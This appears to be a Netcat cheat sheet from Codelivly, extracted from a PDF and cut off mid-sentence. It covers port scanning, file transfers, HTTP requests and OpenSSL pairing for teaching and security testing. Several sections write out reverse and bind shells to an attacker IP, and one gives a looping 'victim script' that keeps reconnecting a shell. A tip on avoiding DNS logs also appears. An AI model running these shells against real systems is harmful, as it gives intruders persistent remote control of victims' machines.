Netcat Cheat Sheet - by

Codelivly
Printable Netcat Cheat Sheet
Here's a compact and easy-to-reference Netcat cheat sheet, perfect for keeping
by your side while working with networking tasks. This cheat sheet covers the
most common commands and options, ensuring you have everything you need at
a glance.

Netcat Command Basics

Command Description
nc [options] Basic syntax for using Netcat. Specify options, the target IP or
[hostname/IP] [port] hostname, and the port number.

nc -l -p [port]
Start Netcat in listen mode, acting as a server on the specified
port.

nc -v
Verbose mode. Shows detailed information about the
connection attempt. Useful for troubleshooting or scanning.

nc -z
Zero I/O mode. Netcat performs a connection scan without
actually sending data. Often used for port scanning.

nc -n
Prevents Netcat from performing DNS lookups. Connect
directly using IP addresses without resolving hostnames.
nc -u Use UDP instead of TCP for the connection.

Executes a specified program after a connection is made.

nc -e [program]
Commonly used to execute shells, such as /bin/bash .

Set a timeout for connection attempts. If the connection

nc -w [seconds]
doesn’t complete within the specified time, Netcat will close.

Set a delay for closing the connection after reaching end-of-

nc -q [seconds] file (EOF). Useful for file transfers where you want to wait
before closing the connection.

Netcat Cheat Sheet - by Codelivly 1

 nc -l -p [port] > [file] Listen on the specified port and save incoming data to a file.
nc [hostname/IP] [port]
< [file] Send the contents of a file to the target IP and port.

nc -zv [hostname/IP] Perform a port scan on the target IP. Netcat will try to connect
[port] to the specified port and provide verbose feedback.
nc -zv [hostname/IP] Scan a range of ports on the target IP. Verbose output will
[start_port]-[end_port] display which ports are open or closed.
nc -l -p [port] -e Create a bind shell on the server, allowing remote command
/bin/bash execution through a connection on the specified port.
nc [hostname/IP] [port] Create a reverse shell that connects back to you and allows
-e /bin/bash remote command execution through a shell.
nc -nv [hostname/IP] Bypass DNS lookup and connect directly to the specified IP
[port] and port with verbose feedback.

nc [hostname] 80
Connect to a web server on port 80. Useful for manually
crafting HTTP requests.
nc -l -p [port] >
[output_file] Receive data on the specified port and write it to a file.

nc [target_IP] [port] <

[input_file] Send a file to the target machine through the specified port.

openssl s_client - Combine with OpenSSL to make a secure (HTTPS) connection

connect [hostname]:443 to the target server.
nc -l -p [port] < Serve a file from the local machine, allowing a remote
/path/to/file machine to download it by connecting to the specified port.

Port Scanning with Netcat

Port scanning is one of the most common tasks Netcat is used for. It allows you to
check which ports are open on a target machine, making it a valuable tool for
network troubleshooting, security auditing, or testing.

Command Description

Scans a single port on the target to check if it is open. The

nc -zv [hostname/IP]
-z flag tells Netcat to scan without sending data, and -v
[port]
enables verbose output.

Netcat Cheat Sheet - by Codelivly 2

 Scans a range of ports on the target machine to see which
nc -zv [hostname/IP]
[start_port]-[end_port] ones are open. This is useful for auditing multiple services
quickly.

Connects to a specific port with the -n flag, which

nc -nv [hostname/IP]
[port] prevents DNS lookups for faster scanning. The -v flag
provides detailed output.

Scans a single port with a specified timeout using the -w

nc -z -w [seconds]
[hostname/IP] [port] flag. This sets how long Netcat waits for a response before
closing the connection.

Scans a range of UDP ports instead of TCP ports. This is

nc -zv [hostname/IP]
[start_port]-[end_port] -u useful when you need to identify UDP-based services
running on the target machine.

nc -zv -i [interval] Scans a range of ports with a specified interval between

[hostname/IP] [start_port]- each scan. The -i flag sets the interval in seconds,
[end_port]
helping to control scan speed.

Full port scan from port 0 to 65535. This comprehensive

nc -zv [hostname/IP] 0-
65535
scan checks every possible port on the target, which can
be useful for a complete audit but may take longer.

Examples:

1. Scan a Specific Port

nc -zv 192.168.1.1 80

Scans port 80 on the target IP 192.168.1.1 .

If the port is open, Netcat will display a successful connection message.

2. Scan a Range of Ports

nc -zv 192.168.1.1 20-100

Scans ports 20 to 100 on the target IP.

Netcat will output the status (open or closed) of each port in the range.

Netcat Cheat Sheet - by Codelivly 3

 3. Scan UDP Ports

nc -zv -u 192.168.1.1 53

Scans port 53 (typically used for DNS) on the target using UDP instead of
TCP.

The u flag specifies that UDP should be used for this scan.

4. Full Port Scan

nc -zv 192.168.1.1 0-65535

Scans all 65,535 ports on the target IP.

This provides a comprehensive view of all services running on the target, but
it may take some time depending on network speed and target response.

5. Scan with a Timeout

nc -z -w 3 192.168.1.1 8080

Scans port 8080 on the target with a timeout of 3 seconds.

If the connection doesn’t respond within the specified time, Netcat will move
on.

Tips:
Always use port scanning ethically and only on systems you own or have
explicit permission to test.

Adjust the interval ( i ) or timeout ( w ) for slower networks or to avoid

overwhelming the target system with too many connection attempts at once.

This table and examples provide a concise guide to using Netcat for port
scanning, making it easy to identify open services and troubleshoot network
issues effectively.

Netcat Cheat Sheet - by Codelivly 4

 File Transfers with Netcat
Netcat is a powerful tool for transferring files between systems quickly and
efficiently. Whether you need to send a single file or automate regular transfers,
Netcat makes it easy to do so over a network.

Command Description

nc -l -p [port] > [filename]

Set up the receiving end to listen on a specified port
and write incoming data to a file.
nc [hostname/IP] [port] < On the sending end, connect to the receiver's IP and
[filename] port, then send the contents of a file.

`tar -czf - /path/to/dir nc [hostname/IP] [port]`

`nc -l -p [port] tar -xzf -`

nc -w [seconds] [hostname/IP] Transfer a file with a timeout. The -w flag sets a
[port] < [filename] timeout (in seconds) for the connection.

`openssl s_server -quiet -accept

nc -l -p [port] > [filename]`
[port]

`nc [hostname/IP] [port] openssl s_client -quiet -connect [hostname]:[port]`

Examples:

1. Simple File Transfer

Receiver (Device 1):

nc -l -p 1234 > received_file.txt

Sender (Device 2):

nc 192.168.1.1 1234 < file_to_send.txt

Explanation:

The receiver listens on port 1234 and saves the incoming data to
received_file.txt .

Netcat Cheat Sheet - by Codelivly 5

 The sender connects to the receiver's IP and port, sending the contents of
file_to_send.txt .

The file transfer starts as soon as the connection is established.

2. Transferring a Directory
If you need to transfer an entire directory, you can compress and send it in one
command:

Receiver (Device 1):

nc -l -p 1234 | tar -xzf -

Sender (Device 2):

tar -czf - /path/to/directory | nc 192.168.1.1 1234

Explanation:

The receiver listens on port 1234 and extracts the incoming compressed
directory using tar .

The sender compresses the directory using tar and pipes the output to
Netcat, which sends it over the network.

3. Setting a Timeout for Transfers

If you want to avoid the connection hanging indefinitely, you can set a timeout:

Receiver (Device 1):

nc -l -p 1234 > received_file.txt

Sender (Device 2):

nc -w 5 192.168.1.1 1234 < file_to_send.txt

Explanation:

Netcat Cheat Sheet - by Codelivly 6

 The w flag sets a 5 second timeout, meaning if the connection isn’t
established within that time, it will close automatically.

4. Secure File Transfer with OpenSSL

If you want to ensure a secure file transfer, you can pair Netcat with OpenSSL:
Receiver (Device 1):

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout c

ert.pem -out cert.pem
openssl s_server -quiet -accept 1234 -key cert.pem -cert cer
t.pem | nc -l -p 1234 > received_file.txt

Sender (Device 2):

nc 192.168.1.1 1234 < file_to_send.txt | openssl s_client -qu

iet -connect 192.168.1.1:1234

Explanation:

The receiver sets up an encrypted server using OpenSSL and listens on

port 1234 , saving the incoming file.

The sender uses Netcat to send the file and encrypts the connection using
OpenSSL, ensuring secure transmission.

5. Automated Backups and Transfers

If you want to automate file transfers, you can create a script that transfers files
regularly:
Example Script:

#!/bin/bash
FILE_TO_SEND="/path/to/backup.tar.gz"
TARGET_IP="192.168.1.2"
PORT=1234

Netcat Cheat Sheet - by Codelivly 7

 nc $TARGET_IP $PORT < $FILE_TO_SEND

Schedule this script with a cron job to run at regular intervals, automating your
backup process.

Chat and Server Setup with Netcat

Netcat makes it easy to set up basic chat systems and simple servers for testing
or troubleshooting. It’s a quick way to establish communication between devices,
test connectivity, or even build small-scale network applications.

Command Description

nc -l -p [port]
Start a Netcat server that listens on the specified port. Useful
for setting up a simple chat or basic TCP server.

nc [hostname/IP] [port]
Connect to a Netcat server as a client. This command
establishes a connection to the server on the specified port.
nc -l -p [port] -e Set up a bind shell on the server side, allowing remote
/bin/bash command execution.
nc [hostname/IP] [port] Set up a reverse shell that connects back to the client’s
-e /bin/bash machine, enabling remote access.

nc -l -k -p [port]
Start a persistent server that remains open after the client
disconnects (useful for multiple connections).

nc -u -l -p [port]
Set up a UDP server instead of TCP, which can be used for
specific UDP-based communication or testing.
nc [hostname/IP] [port] Connect to a UDP server. This sends data using UDP instead
-u of TCP.

Examples:

1. Setting Up a Simple Chat System

Netcat allows you to create a basic chat system between two devices using a
client-server model.

Server (Device 1):

Netcat Cheat Sheet - by Codelivly 8

 nc -l -p 1234

Client (Device 2):

nc 192.168.1.1 1234

Explanation:

The server listens on port 1234 for incoming connections.

The client connects to the server’s IP address on the same port.

Once connected, anything you type in either terminal will be visible on

both devices, functioning like a basic chat application.

2. Creating a Simple TCP Server

Netcat can be used to set up a simple TCP server that accepts connections and
displays messages from clients.
Server Command:

nc -l -p 8080

This command starts a TCP server that listens for connections on port 8080 .

Any client connecting to this port will be able to send messages, and the
server will display them in the terminal.

3. Setting Up a Persistent Server

If you want the server to stay open even after a client disconnects (useful for
testing multiple connections), you can use the -k flag.
Persistent Server Command:

nc -l -k -p 5555

The k flag keeps the server open after a connection is closed, allowing
multiple clients to connect one after the other without restarting the server.

Netcat Cheat Sheet - by Codelivly 9

 4. Setting Up a UDP Server
Sometimes, you may need to work with UDP instead of TCP. Netcat can also act
as a UDP server:

UDP Server (Device 1):

nc -u -l -p 1234

UDP Client (Device 2):

nc -u 192.168.1.1 1234

The server listens for UDP connections on port 1234 .

The client sends UDP messages to the server’s IP and port.

This setup is useful for testing UDP-based applications or services.

5. Setting Up a Reverse Shell

Netcat is often used in penetration testing for setting up reverse shells (in legal,
controlled environments). This allows a remote device to connect back to you,
granting remote shell access.
On the Attacker’s Machine (Listening Mode):

nc -l -p 4444

On the Victim’s Machine:

nc [attacker_IP] 4444 -e /bin/bash

The attacker listens on port 4444 , waiting for a connection.

The victim’s machine connects back to the attacker’s IP on the same port and
executes /bin/bash , providing a shell to the attacker.

Warning: Use this command responsibly and only in

environments where you have explicit permission.

Netcat Cheat Sheet - by Codelivly 10

 6. Setting Up a Bind Shell
A bind shell works in the opposite way of a reverse shell: the server opens a shell
that the client can connect to.
On the Server:

nc -l -p 1234 -e /bin/bash

On the Client:

nc 192.168.1.1 1234

The server opens a shell on port 1234 and waits for a client to connect.

The client connects and gains shell access.

Note: This is another technique used in penetration testing and

should only be executed legally and ethically.

7. Connecting to a Web Server

Netcat can be used to manually test if a web server is running and responding
correctly by connecting to it.

nc example.com 80

After connecting, you can type:

GET / HTTP/1.1
Host: example.com

Press Enter twice.

The web server’s response will be displayed in your terminal, allowing you to
see the raw HTTP response.

Creating Reverse and Bind Shells with Netcat

Netcat Cheat Sheet - by Codelivly 11

 Netcat is a powerful tool for setting up reverse and bind shells, which are
frequently used in penetration testing and security research (always with
permission!). These shells allow remote access to a system, either by having the
target connect back to you (reverse shell) or by you connecting directly to an
open shell on the target (bind shell).

Command Description

Set up a bind shell on the target machine. The server listens on

nc -l -p [port] -e
/bin/bash the specified port and spawns a shell when a connection is
made.
nc [hostname/IP] [port] Set up a reverse shell on the target machine, connecting back
-e /bin/bash to the attacker's machine and providing shell access.

On the attacker's machine, this command listens on the

nc -l -p [port] specified port, waiting for the target to connect back (used with
reverse shells).
nc -nv [hostname/IP]
[port] Connect to a bind shell on the target machine.

nc -l -p [port] -e Set up a bind shell on Windows, using cmd.exe instead of

cmd.exe /bin/bash .

nc [hostname/IP] [port] Set up a reverse shell on a Windows target, connecting back to

-e cmd.exe the attacker’s machine using cmd.exe .

Examples:

1. Setting Up a Reverse Shell

A reverse shell is when the target machine connects back to the attacker’s
machine, allowing remote access. This method is often used to bypass firewalls
that may block incoming connections.
On the Attacker’s Machine (Listening Mode):

nc -l -p 4444

This command opens a listener on port 4444 , waiting for the target to connect
back.

Netcat Cheat Sheet - by Codelivly 12

 On the Target Machine (Connecting Back):

nc [attacker_IP] 4444 -e /bin/bash

The target connects to the attacker’s IP address on port 4444 and executes
/bin/bash , providing a shell session to the attacker.

Note: Replace [attacker_IP] with the actual IP address of the

attacker’s machine. Use this method only in controlled, legal
environments.

2. Setting Up a Bind Shell

A bind shell opens a shell on the target machine and waits for a connection from
the attacker. It binds a shell to a specified port that the attacker can connect to
directly.
On the Target Machine (Setting Up the Shell):

nc -l -p 1234 -e /bin/bash

This command opens a listener on port 1234 and executes /bin/bash when a
connection is established.

On the Attacker’s Machine (Connecting to the Shell):

nc [target_IP] 1234

The attacker connects to the target’s IP on port 1234 , gaining shell access.

Note: Ensure that the port is open and accessible on the target
machine. Modify firewall settings if necessary to allow
connections on the specified port.

3. Reverse Shell on Windows

When working with a Windows target, you’ll use cmd.exe instead of /bin/bash .

Netcat Cheat Sheet - by Codelivly 13

 On the Attacker’s Machine (Listening Mode):

nc -l -p 5555

On the Target Machine (Connecting Back):

nc [attacker_IP] 5555 -e cmd.exe

This connects back to the attacker’s IP on port 5555 , launching a cmd.exe shell
session.

Tip: Make sure Netcat is installed on the Windows target. You

can download Netcat for Windows and place it in a convenient
directory.

4. Bind Shell on Windows

For a bind shell on Windows, you also use cmd.exe .
On the Target Machine (Setting Up the Shell):

nc -l -p 4444 -e cmd.exe

On the Attacker’s Machine (Connecting to the Shell):

nc [target_IP] 4444

The attacker connects to port 4444 on the target’s IP, gaining access to the
Windows command prompt.

5. Securing Reverse Shells with OpenSSL

Using OpenSSL with Netcat adds a layer of encryption to protect your connection,
which is important in some penetration testing scenarios.

On the Attacker’s Machine (Listening Securely):

Netcat Cheat Sheet - by Codelivly 14

 openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout m
ycert.pem -out mycert.pem
openssl s_server -quiet -accept 5555 -key mycert.pem -cert my
cert.pem

On the Target Machine (Connecting Securely):

nc [attacker_IP] 5555 -e /bin/bash | openssl s_client -quiet

-connect [attacker_IP]:5555

This setup encrypts the reverse shell session, making it more secure. Replace
[attacker_IP] with the attacker's actual IP address.

Important: Always use encryption when transmitting sensitive

information or accessing systems remotely.

Sending HTTP Requests with Netcat

Netcat can be used to manually craft and send HTTP requests, which is
particularly useful for testing web servers, understanding HTTP communication,
or troubleshooting issues. It’s a great way to see how servers respond to specific
HTTP requests without using a browser or specialized tools.

Command Description

Connects to a web server on port 80 (default HTTP

nc [hostname/IP] 80
port).

Manually sends a GET request to the root directory of

GET / HTTP/1.1
the web server (use with Netcat).

Specifies the Host header for the HTTP request,

Host: [hostname]
necessary for HTTP/1.1 requests.

Manually sends a POST request to a specific path on the

POST /path HTTP/1.1
web server (use with Netcat).
Content-Type: application/x- Specifies the content type for the request body (required
www-form-urlencoded for POST requests with form data).

Netcat Cheat Sheet - by Codelivly 15

 Specifies the length of the data being sent in the request
Content-Length: [length]
body (useful for POST requests).

openssl s_client -connect Use OpenSSL with Netcat to send HTTPS requests,
[hostname]:443 establishing an encrypted connection over port 443 .

Examples:

1. Sending a Basic HTTP GET Request

To manually fetch a webpage using Netcat, follow these steps:

nc example.com 80

After connecting, type the following HTTP request:

GET / HTTP/1.1
Host: example.com

Explanation:

The GET / HTTP/1.1 line requests the root directory ( / ) using HTTP/1.1.

The Host: example.com line specifies the host header, which is required for
HTTP/1.1 to support multiple domains hosted on the same IP.

Press Enter twice to send the request. The server will respond with the HTML
content of the page or an HTTP status code (e.g., 200 OK ).

2. Sending an HTTP POST Request

You can also manually send a POST request to simulate submitting data (like a
form) to the server:

nc example.com 80

After connecting, type the following HTTP request:

Netcat Cheat Sheet - by Codelivly 16

 POST /submit-form HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

param1=value1&param2=value2

Explanation:

The POST /submit-form HTTP/1.1 line specifies the path /submit-form where the
request will be sent.

The Content-Type header indicates that we are sending form data.

The Content-Length header specifies the length of the data being sent (in
bytes).

The form data ( param1=value1&param2=value2 ) is provided below the headers.

Press Enter twice after typing the data to send the request. The server will
respond based on the endpoint’s configuration.

3. Testing HTTP Headers

Netcat allows you to customize HTTP headers to see how the server reacts:

nc example.com 80

Type the following:

GET / HTTP/1.1
Host: example.com
User-Agent: NetcatClient/1.0

The User-Agent header identifies the client making the request. You can modify
it to see how the server behaves when different user agents are used.

Press Enter twice, and you’ll receive the server’s response with details about how
it processed the request.

Netcat Cheat Sheet - by Codelivly 17

 4. Connecting to a Secure Web Server (HTTPS)
Netcat alone cannot handle HTTPS because it requires an encrypted connection.
However, you can pair it with OpenSSL:

openssl s_client -connect example.com:443

After the connection is established, type the following:

GET / HTTP/1.1
Host: example.com

This sends an encrypted HTTP request over HTTPS. Press Enter twice to
receive the server’s response.

Note: OpenSSL establishes the SSL/TLS connection, while

Netcat helps structure the request.

5. Testing API Endpoints

You can use Netcat to test API endpoints manually by sending specific requests to
different paths:

nc api.example.com 80

Type:

GET /api/v1/users HTTP/1.1

Host: api.example.com
Accept: application/json

The Accept header indicates that the client expects a JSON response. This is
useful when testing RESTful APIs.

Press Enter twice, and the server should return the response for the /api/v1/users

endpoint.

Netcat Cheat Sheet - by Codelivly 18

 Tips for Using Netcat for HTTP Requests:
Press Enter Twice: Remember to press Enter twice after typing your HTTP
request to signal the end of the headers and send the request.

Use Headers Wisely: Customize headers like User-Agent , Content-Type , and

Accept to see how the server responds to different configurations.

Debugging: Netcat’s verbose mode ( v ) can be used to debug if you’re not

receiving expected responses from the server.

HTTPS: Pair Netcat with OpenSSL to work with HTTPS, as Netcat alone does
not support encrypted connections.

Automating Netcat with Shell Scripting

Netcat’s versatility shines when it’s combined with shell scripting, allowing you to
automate tasks such as port scanning, file transfers, network monitoring, and
more.

Command Description
nc -zv [hostname/IP] [port] Automate port scanning for a specific port.
nc -zv [hostname/IP]
[start_port]-[end_port] Scan a range of ports on a target automatically.

Automate receiving files over a network and saving them

nc -l -p [port] > [file]
to a file.
nc [hostname/IP] [port] < Automate sending files by integrating this command in a
[file] script.

Use Netcat for an automated bind shell that can be

nc -l -p [port] -e /bin/bash
integrated into a script for testing environments.
nc [hostname/IP] [port] -e
/bin/bash Automate reverse shell connections.

nc -w [seconds] [hostname/IP] Set up timeouts for automated tasks in shell scripts using
[port] Netcat.

`echo "message" nc [hostname/IP] [port]`

Examples:

Netcat Cheat Sheet - by Codelivly 19

 1. Automating Port Scanning with a Script
Automating port scanning with Netcat allows you to check multiple ports on
multiple targets regularly. Here’s an example of a simple script that checks if
specific ports are open:

#!/bin/bash

TARGET="192.168.1.1"
PORTS=(22 80 443)

for PORT in "${PORTS[@]}"; do

nc -zv $TARGET $PORT &> /dev/null
if [ $? -eq 0 ]; then
echo "Port $PORT on $TARGET is open."
else
echo "Port $PORT on $TARGET is closed."
fi
done

Explanation:

The script loops through the array of ports ( 22 , 80 , 443 ) and checks if
they are open on the target.

The exit status ( $? ) determines whether the port is open (0) or closed
(non-zero).

The script runs silently ( &> /dev/null ), only outputting whether the ports are
open or closed.

2. Automating File Transfers Between Systems

Netcat can be used in scripts to automate file transfers between systems. Here’s
an example script for the sender and receiver:
Receiver Script:

Netcat Cheat Sheet - by Codelivly 20

 #!/bin/bash

PORT=1234
OUTPUT_FILE="/path/to/received_file.txt"

nc -l -p $PORT > $OUTPUT_FILE

This script listens on port 1234 and writes any incoming data to
received_file.txt .

Sender Script:

#!/bin/bash

FILE_TO_SEND="/path/to/file.txt"
TARGET_IP="192.168.1.2"
PORT=1234

nc $TARGET_IP $PORT < $FILE_TO_SEND

This script reads the file and sends it to the target IP on port 1234 .

You can schedule these scripts with cron to automate transfers on a regular
basis.

3. Automating HTTP Requests

You can automate HTTP GET requests using Netcat in a script to monitor server
responses:

#!/bin/bash

SERVER="example.com"
PORT=80

RESPONSE=$(echo -e "GET / HTTP/1.1\\nHost: $SERVER\\n\\n" | n

c $SERVER $PORT)

Netcat Cheat Sheet - by Codelivly 21

 if [[ $RESPONSE == *"200 OK"* ]]; then
echo "Server is up and returned 200 OK"
else
echo "Server is down or returned an unexpected response"
fi

Explanation:

The script sends an HTTP GET request to the server and captures the
response.

It checks if the response contains 200 OK to verify if the server is running

properly.

4. Network Health Monitoring

Create a script to ping multiple servers and check if their web services are up:

#!/bin/bash

SERVERS=("192.168.1.1" "192.168.1.2" "192.168.1.3")

PORT=80

for SERVER in "${SERVERS[@]}"; do

echo "Checking $SERVER..."
RESPONSE=$(echo -e "GET / HTTP/1.1\\nHost: $SERVER\\n\\n" |
nc -w 5 $SERVER $PORT)
if [[ $RESPONSE == *"200 OK"* ]]; then
echo "Server $SERVER is up."
else
echo "Server $SERVER is down or not responding."
fi
done

The script iterates through each server in the list and uses Netcat to check if
port 80 is responsive, indicating the server is up.

Netcat Cheat Sheet - by Codelivly 22

 5. Automating Reverse Shell Creation
For penetration testing (in a controlled environment), you might want to automate
the creation of reverse shells.
Victim Script (to run on the target):

#!/bin/bash

ATTACKER_IP="192.168.1.10"
PORT=5555

while true; do
nc $ATTACKER_IP $PORT -e /bin/bash
sleep 60
done

Explanation:

The script continuously attempts to connect back to the attacker’s IP every

60 seconds.

If the connection fails, it waits ( sleep 60 ) and tries again, providing remote
shell access when successful.

6. Automating Backups Using Netcat

You can automate the transfer of backup files using Netcat:

Backup Script (Sender):

#!/bin/bash

TARGET_IP="192.168.1.2"
PORT=4444
DIRECTORY="/path/to/directory"
BACKUP_FILE="/tmp/backup.tar.gz"

Netcat Cheat Sheet - by Codelivly 23

 tar -czf $BACKUP_FILE $DIRECTORY
nc $TARGET_IP $PORT < $BACKUP_FILE

Receiver Script:

#!/bin/bash

PORT=4444
OUTPUT_FILE="/path/to/backup.tar.gz"

nc -l -p $PORT > $OUTPUT_FILE

Explanation:

The sender compresses the directory and sends it using Netcat.

The receiver listens for the incoming file and saves it.

These scripts can be scheduled using cron to automate backups regularly.

7. Automated Messaging Between Systems

You can send automated messages between systems using Netcat in a script:
Sender Script:

#!/bin/bash

MESSAGE="Automated message from sender"

TARGET_IP="192.168.1.2"
PORT=8888

echo $MESSAGE | nc $TARGET_IP $PORT

Receiver Script:

#!/bin/bash

PORT=8888

Netcat Cheat Sheet - by Codelivly 24

 nc -l -p $PORT

The sender sends a message through Netcat, and the receiver displays it.

This is useful for basic messaging systems or notifications between devices.

Other Useful Flags

Flag Description
-u Use UDP instead of TCP.
-e /bin/bash Execute a program or shell upon connection.
-w [seconds] Set a timeout for connections.
-q [seconds] Disconnect after a specific time after EOF.

Example:

nc -w 5 [hostname/IP] [port]

(Sets a timeout of 5 seconds for the connection)

Preventing DNS Lookup with Netcat

By default, Netcat attempts to resolve hostnames to IP addresses when you
connect to a server. While this is usually helpful, it can slow down connections if
the DNS resolution takes time, or if you’re troubleshooting connectivity issues and
want to bypass DNS altogether. You can prevent Netcat from performing DNS
lookups by using the -n flag.

Command Description

Connects directly to the specified IP address without

nc -nv [hostname/IP]
[port]
attempting to resolve a hostname. The -v flag provides
verbose output.
nc -zvn [hostname/IP] Performs a port scan without DNS resolution and provides
[port] verbose output for each port checked.

Netcat Cheat Sheet - by Codelivly 25

 Connects directly to an IP address without any DNS lookup
nc -n [hostname/IP] [port]
or verbose output.
nc -zvn [hostname/IP] Scans a range of ports without resolving hostnames,
[start_port]-[end_port] providing a faster scan result.

Examples:

1. Connecting Directly to an IP Without DNS Lookup

If you want to connect directly to an IP address without waiting for DNS resolution,
use:

nc -nv 192.168.1.1 80

Explanation:

The n flag tells Netcat to skip DNS resolution and directly use the IP
address.

The v flag provides verbose output, showing you details of the

connection process.

This command connects to port 80 of the target IP 192.168.1.1 .

2. Scanning a Specific Port Without DNS Lookup

To perform a quick port scan on a target IP without waiting for DNS resolution:

nc -zvn 192.168.1.1 22

Explanation:

The z flag puts Netcat in zero-I/O mode for scanning purposes.

The v flag provides feedback about the scan results, showing whether
the port is open or closed.

The n flag prevents DNS lookup, making the scan faster.

3. Scanning a Range of Ports Without DNS Resolution

Netcat Cheat Sheet - by Codelivly 26

 You can scan a range of ports quickly by using the -n flag:

nc -zvn 192.168.1.1 20-80

Explanation:

This command scans ports 20 through 80 on the target IP ( 192.168.1.1 ).

The n flag ensures that no DNS lookup is attempted, speeding up the

scan process.

4. Testing Connectivity Without DNS

If you’re testing connectivity and you know the target IP address, you can use:

nc -n 192.168.1.1 443

This connects directly to port 443 on the target IP address without attempting
to resolve any hostname.

This is particularly useful in environments where DNS resolution might be

unreliable or if you want to avoid DNS logs.

Why Prevent DNS Lookup?

Faster Connections: Skipping DNS resolution speeds up the connection
process, especially when testing multiple ports or scanning a range of IP
addresses.

Troubleshooting: If you’re troubleshooting connectivity issues, preventing

DNS lookups can help you determine if the problem lies with DNS servers or
the target service itself.

Avoid DNS Logs: In some security scenarios, preventing DNS resolution can
help avoid creating DNS logs that might reveal your testing activity.

Tips:
Use the v flag: Combining v with n gives you detailed feedback without the
delay of DNS lookups.

Netcat Cheat Sheet - by Codelivly 27

 Combine with Other Flags: You can combine n with other flags like z (zero-
I/O) for port scanning or w (timeout) to refine your testing further.

Direct IP Use: The n flag is only effective when you specify an IP address
instead of a hostname. If you use a hostname, DNS lookup will still occur
regardless of the flag.

Encrypting Netcat Connections with OpenSSL

Netcat alone does not provide encryption for the data being transmitted, which
can be a security risk, especially when sending sensitive information. To secure
your Netcat sessions, you can use OpenSSL to create an encrypted tunnel,
ensuring your data is protected while it travels over the network.

Command Description
openssl req -x509 -nodes -days 365 -
Generate a self-signed certificate and key for
newkey rsa:2048 -keyout cert.pem -out
cert.pem use with OpenSSL.

Set up a secure server using OpenSSL to

openssl s_server -quiet -accept [port]
-key cert.pem -cert cert.pem accept encrypted connections on the
specified port.

Connect to a secure server using OpenSSL.

openssl s_client -quiet -connect
[hostname]:[port] This command pairs with Netcat to secure the
connection.

openssl s_server -accept [port] -key cert.pem

`nc -l -p [port]
-cert cert.pem`

`echo [message] openssl s_client -connect [hostname]:[port]`

Examples:

1. Generating a Self-Signed Certificate

Before you can set up an encrypted Netcat session, you need to generate a self-
signed certificate:

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout c

ert.pem -out cert.pem

Netcat Cheat Sheet - by Codelivly 28

 Explanation:

This command creates a self-signed certificate ( cert.pem ) and a private

key ( cert.pem ) valid for 365 days.

You’ll be prompted for some basic information, but you can leave most
fields blank if you’re testing locally.

2. Setting Up an Encrypted Server

To set up a secure server that encrypts communications, use OpenSSL in
conjunction with Netcat:

openssl s_server -quiet -accept 1234 -key cert.pem -cert cer

t.pem

Explanation:

The s_server command starts a secure server using the certificate and key
you generated.

The server listens on port 1234 for incoming connections.

The quiet flag suppresses verbose output, making it cleaner.

3. Connecting Securely as a Client

To connect to the encrypted server, you can use OpenSSL’s client mode:

openssl s_client -quiet -connect 192.168.1.1:1234

Explanation:

The s_client command connects to the server at 192.168.1.1 on port 1234

using an encrypted connection.

The quiet flag minimizes output to only show relevant information.

Once connected, you can type messages, and they will be sent securely to the
server.

4. Encrypting a Netcat Session

Netcat Cheat Sheet - by Codelivly 29

 If you want to combine Netcat with OpenSSL to encrypt a session, follow these
steps:
On the Server:

openssl s_server -quiet -accept 4444 -key cert.pem -cert cer

t.pem | nc -l -p 4444

This sets up an encrypted server that listens on port 4444 and uses Netcat to
handle incoming connections.

On the Client:

nc 192.168.1.1 4444 | openssl s_client -quiet -connect 192.16

8.1.1:4444

The client connects to the server’s IP and port, using OpenSSL to secure the
connection.

5. Sending Encrypted Files

You can securely transfer files using Netcat and OpenSSL by setting up a listener
and sending data through an encrypted tunnel.
On the Receiving Machine (Server):

openssl s_server -quiet -accept 5555 -key cert.pem -cert cer

t.pem | nc -l -p 5555 > received_file.txt

The server listens on port 5555 for an encrypted connection and saves the
incoming file as received_file.txt .

On the Sending Machine (Client):

cat file_to_send.txt | openssl s_client -quiet -connect 192.1

68.1.1:5555 | nc 192.168.1.1 5555

The client reads file_to_send.txt and sends it through an encrypted connection

to the server’s IP on port 5555 .

Netcat Cheat Sheet - by Codelivly 30

 6. Automating Encrypted Connections
You can automate encrypted Netcat sessions with shell scripts for testing or
secure file transfers:
Example Script (Server Side):

#!/bin/bash

PORT=5555
openssl s_server -quiet -accept $PORT -key cert.pem -cert cer
t.pem | nc -l -p $PORT > received_file.txt

This script starts an encrypted server, listens for incoming data, and writes it
to received_file.txt .

Example Script (Client Side):

#!/bin/bash

TARGET_IP="192.168.1.2"
PORT=5555
FILE_TO_SEND="/path/to/file.txt"

cat $FILE_TO_SEND | openssl s_client -quiet -connect $TARGET_

IP:$PORT | nc $TARGET_IP $PORT

This script reads a file and sends it securely to the specified IP and port using
Netcat and OpenSSL.

Tips for Using OpenSSL with Netcat:

Use Valid Certificates: While self-signed certificates are fine for testing, use
valid certificates issued by a trusted CA for production environments.

Automation: Automate secure file transfers or communication tasks using

shell scripts and cron jobs for efficient, scheduled operations.

Netcat Cheat Sheet - by Codelivly 31

 Encryption for Sensitive Data: Always encrypt sensitive data transmissions,
especially over untrusted networks, to prevent unauthorized access.

Verify Connections: Use OpenSSL’s verbose mode (without quiet ) to

troubleshoot connections and verify certificates when setting up new servers.

Automating File Transfers with Shell Scripts and Netcat

Netcat is an excellent tool for setting up file transfers between systems, and when
combined with shell scripts, you can automate the process for regular backups,
file sharing, or syncing data. Below is a table summarizing common Netcat
commands for scripting file transfers effectively.

Command Description

nc -l -p [port] > [filename]

On the receiver side, listens on the specified port and
saves the incoming data to a file.
nc [hostname/IP] [port] < On the sender side, connects to the receiver’s IP and
[filename] port, then sends the contents of a file.

`tar -czf - /path/to/directory nc [hostname/IP] [port]`

`nc -l -p [port] tar -xzf -`

nc -w [seconds] [hostname/IP] Sends a file with a specified timeout, closing the
[port] < [filename] connection if it’s not established within the given time.

`openssl s_server -quiet -accept

nc -l -p [port] > [filename]`
[port]

Examples of Automated File Transfers

1. Basic File Transfer Script

The following scripts set up an automated file transfer between two systems.
Receiver Script (Server):

#!/bin/bash

PORT=1234
OUTPUT_FILE="/path/to/received_file.txt"

Netcat Cheat Sheet - by Codelivly 32

 echo "Listening for incoming file on port $PORT..."
nc -l -p $PORT > $OUTPUT_FILE
echo "File received and saved to $OUTPUT_FILE."

Explanation:

This script listens on port 1234 and saves any incoming data to
